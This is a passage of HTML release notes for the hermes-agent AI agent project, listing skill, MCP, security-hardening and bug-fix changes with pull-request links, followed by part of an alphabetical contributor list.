<li>Curator: surface unmanaged skills + <code>curator adopt</code>; skill-description truncation surfaced to authors; grounded-citations skill (+ fact-checking mode); simplify-code v1.1; tldraw-offline scripting skill (<a href="https://github.com/NousResearch/hermes-agent/pull/71648" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/71648/hovercard">#71648</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/70519" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/70519/hovercard">#70519</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/71698" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/71698/hovercard">#71698</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/77104" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/77104/hovercard">#77104</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/70440" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/70440/hovercard">#70440</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/66896" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/66896/hovercard">#66896</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Office skills bundled: docx, xlsx, pdf + refreshed powerpoint; skills-tree debloat continues (yuanbao, segment-anything, jupyter, heartmula, audiocraft → optional-skills; claude-marketplace source removed; hub restructure absorbing themes/desktop-plugins/tui-widgets) (<a href="https://github.com/NousResearch/hermes-agent/pull/68595" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/68595/hovercard">#68595</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/70452" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/70452/hovercard">#70452</a>–<a href="https://github.com/NousResearch/hermes-agent/pull/70456" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/70456/hovercard">#70456</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/73903" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73903/hovercard">#73903</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>MCP: Comfy Cloud catalog entry with curated 20-tool default; hidden-whitespace warnings in MCP config; pinecone-research optional skill (<a href="https://github.com/NousResearch/hermes-agent/pull/66112" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/66112/hovercard">#66112</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/75736" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/75736/hovercard">#75736</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/70512" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/70512/hovercard">#70512</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>MCP lazy server startup from a fingerprint-keyed on-disk tool-schema cache — configured servers no longer all boot at session start (design from <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4791740729" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/56832" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56832/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/56832">#56832</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/77511" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/77511/hovercard">#77511</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
<li>NeMo Relay observability integration — re-landed after an in-window revert, on stable NeMo Relay 0.6 (<a href="https://github.com/NousResearch/hermes-agent/pull/67607" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67607/hovercard">#67607</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/afourniernv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/afourniernv">@afourniernv</a>)</li>
<li>Gateway health &amp; diagnostics OTLP export (<a href="https://github.com/NousResearch/hermes-agent/pull/64536" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64536/hovercard">#64536</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/victor-kyriazakos/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/victor-kyriazakos">@victor-kyriazakos</a>)</li>
</ul>
<h2>🔒 Security &amp; Reliability</h2>
<ul>
<li>Iron-proxy credential-injection egress firewall re-landed (<a href="https://github.com/NousResearch/hermes-agent/pull/70848" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/70848/hovercard">#70848</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>DNS-pinned SSRF-safe fetches + Slack CDN allowlist; strict redaction at compaction boundaries; ReDoS eliminated in config-key redaction patterns; prose words embedding a secret keyword no longer masked (<a href="https://github.com/NousResearch/hermes-agent/pull/70193" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/70193/hovercard">#70193</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/69294" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/69294/hovercard">#69294</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/76083" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/76083/hovercard">#76083</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67776" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67776/hovercard">#67776</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Tier-3 credential reads scoped (FAL/XAI/VERCEL/DAYTONA/GITHUB presence checks etc.); CVE dependency pins refreshed (cryptography, starlette, python-multipart); hindsight env file 0600; /model moved off the gateway event loop (<a href="https://github.com/NousResearch/hermes-agent/pull/75888" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/75888/hovercard">#75888</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/72362" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72362/hovercard">#72362</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Windows hardening wave: text-mode subprocess decode bug class closed repo-wide, console flashes hidden across daemons/env probes/LSP/installer paths, residual encoding gaps (MCP stdio, gateway update I/O, STT/TTS, desktop spawn) (<a href="https://github.com/NousResearch/hermes-agent/pull/70875" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/70875/hovercard">#70875</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/70205" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/70205/hovercard">#70205</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/70264" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/70264/hovercard">#70264</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/71014" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/71014/hovercard">#71014</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, salvaging several community PRs)</li>
<li>State/session integrity: four session-state fixes (safe close tracking, flush-cursor class fix, row-retry, usage-PK healer); compact v23 FTS layout + <code>hermes sessions optimize</code> + CJK-bigram FTS; read-path split with per-thread read-only connections (<a href="https://github.com/NousResearch/hermes-agent/pull/75883" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/75883/hovercard">#75883</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65798" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65798/hovercard">#65798</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/69423" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/69423/hovercard">#69423</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/73344" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73344/hovercard">#73344</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
<li>OpenViking memory-provider hardening — fail closed on blocked endpoints, server verification before credentials are sent, config.yaml-first settings (<a href="https://github.com/NousResearch/hermes-agent/pull/77747" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/77747/hovercard">#77747</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
<li>Credential pool: reset-aware primary restore (stay on fallback until the rate-limit window resets) + deferred-refresh locking fixes; FTS UPDATE triggers narrowed with fail-closed CJK migration (<a href="https://github.com/NousResearch/hermes-agent/pull/77631" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/77631/hovercard">#77631</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/77628" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/77628/hovercard">#77628</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
<li>Config-driven memory allocator trim with telemetry; holographic memory vectors stored float32; loop-invariant HRR encodes hoisted (<a href="https://github.com/NousResearch/hermes-agent/pull/76905" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/76905/hovercard">#76905</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/76917" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/76917/hovercard">#76917</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/76881" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/76881/hovercard">#76881</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
</ul>
<h2>🐛 Notable Bug Fixes</h2>
<ul>
<li>Voice: full-duplex interruption during generation AND playback; whole-turn desktop speech; auto-TTS delivery gaps (<a href="https://github.com/NousResearch/hermes-agent/pull/74223" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/74223/hovercard">#74223</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/69936" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/69936/hovercard">#69936</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/73508" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73508/hovercard">#73508</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Desktop: Stop parks the queue instead of firing the next queued prompt; branch-in-new-chat restart loss; false remote-gateway reauthentication; cross-session composer leaks (<a href="https://github.com/NousResearch/hermes-agent/pull/68725" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/68725/hovercard">#68725</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/71960" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/71960/hovercard">#71960</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/68250" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/68250/hovercard">#68250</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/70986" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/70986/hovercard">#70986</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SHL0MS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SHL0MS">@SHL0MS</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alelpoan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alelpoan">@alelpoan</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/helix4u/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/helix4u">@helix4u</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Gateway: session lists scoped before limiting; relay-backed home delivery after restart; timeline display events persisted (<a href="https://github.com/NousResearch/hermes-agent/pull/65509" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65509/hovercard">#65509</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/70102" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/70102/hovercard">#70102</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/69771" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/69771/hovercard">#69771</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/GodsBoy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/GodsBoy">@GodsBoy</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/victor-kyriazakos/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/victor-kyriazakos">@victor-kyriazakos</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethernet8023/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethernet8023">@ethernet8023</a>)</li>
<li>Agent: context-length fallback logging + batch trajectory durability; Codex OAuth context windows revalidated against the live catalog (<a href="https://github.com/NousResearch/hermes-agent/pull/76027" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/76027/hovercard">#76027</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/68554" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/68554/hovercard">#68554</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>...plus roughly 770 more <code>fix:</code> PRs across every subsystem this window.</li>
</ul>
<h2>👥 Contributors</h2>
<p><strong>647 contributors</strong> shipped this release (commit authors, co-authors, and salvaged-PR credits).</p>
<h3>Core</h3>
<p><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a> (desktop, voice, perf), <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a> (perf, caching, salvage), <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethernet8023/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethernet8023">@ethernet8023</a> (runtime, E2E, desktop), <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a> (relay, HSP, auth)</p>
<h3>All Contributors (alphabetical)</h3>
<p><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/02356abc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/02356abc">@02356abc</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0301chris/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0301chris">@0301chris</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0xAlcibiades/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0xAlcibiades">@0xAlcibiades</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0xDevNinja/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0xDevNinja">@0xDevNinja</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0xLeathery/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0xLeathery">@0xLeathery</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0xprincess/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0xprincess">@0xprincess</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0xr00tf3rr3t/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0xr00tf3rr3t">@0xr00tf3rr3t</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/2001Y/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/2001Y">@2001Y</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/3ssiri/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/3ssiri">@3ssiri</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/55nx954gn6-debug/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/55nx954gn6-debug">@55nx954gn6-debug</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/686f6c61/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/686f6c61">@686f6c61</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/87degrees/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/87degrees">@87degrees</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aaronlab/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aaronlab">@aaronlab</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/abundantbeing/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/abundantbeing">@abundantbeing</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Adolanium/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Adolanium">@Adolanium</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/adriansotomora/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/adriansotomora">@adriansotomora</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/adurham/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/adurham">@adurham</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/afourniernv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/afourniernv">@afourniernv</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/afurm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/afurm">@afurm</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AgenticSpark/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AgenticSpark">@AgenticSpark</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ahmadashfq/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ahmadashfq">@ahmadashfq</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AhmetArif0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AhmetArif0">@AhmetArif0</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ai-ag2026/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ai-ag2026">@ai-ag2026</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AIalliAI/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AIalliAI">@AIalliAI</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aider4ryder/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aider4ryder">@aider4ryder</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/airclear/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/airclear">@airclear</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ajzrva-sys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ajzrva-sys">@ajzrva-sys</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/akattelu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/akattelu">@akattelu</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AKAZIK-py/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AKAZIK-py">@AKAZIK-py</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/akb4q/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/akb4q">@akb4q</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/akshan-main/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/akshan-main">@akshan-main</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AlanBurningsuit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AlanBurningsuit">@AlanBurningsuit</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alelpoan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alelpoan">@alelpoan</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AlexFucuson9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AlexFucuson9">@AlexFucuson9</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AlexxRussell/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AlexxRussell">@AlexxRussell</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AllardQuek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AllardQuek">@AllardQuek</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alt-glitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alt-glitch">@alt-glitch</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aman-merchant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aman-merchant">@aman-merchant</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amanning3390/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amanning3390">@amanning3390</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amathxbt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amathxbt">@amathxbt</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aml1973/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aml1973">@aml1973</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amoreno16003/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amoreno16003">@amoreno16003</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AndrewMoryakov/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AndrewMoryakov">@AndrewMoryakov</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/andrexibiza/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/andrexibiza">@andrexibiza</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/andynguyendk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/andynguyendk">@andynguyendk</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/andyylin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/andyylin">@andyylin</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aneym/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aneym">@aneym</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/angelos/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/angelos">@angelos</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aniruddhaadak80/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aniruddhaadak80">@aniruddhaadak80</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AnnasMazhar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AnnasMazhar">@AnnasMazhar</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/annguyenNous/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/annguyenNous">@annguyenNous</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/anoopmehendale-cue/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/anoopmehendale-cue">@anoopmehendale-cue</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AnthonyFrancis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AnthonyFrancis">@AnthonyFrancis</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/arcabotai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/arcabotai">@arcabotai</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ArcherQAQ/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ArcherQAQ">@ArcherQAQ</a>,<br>
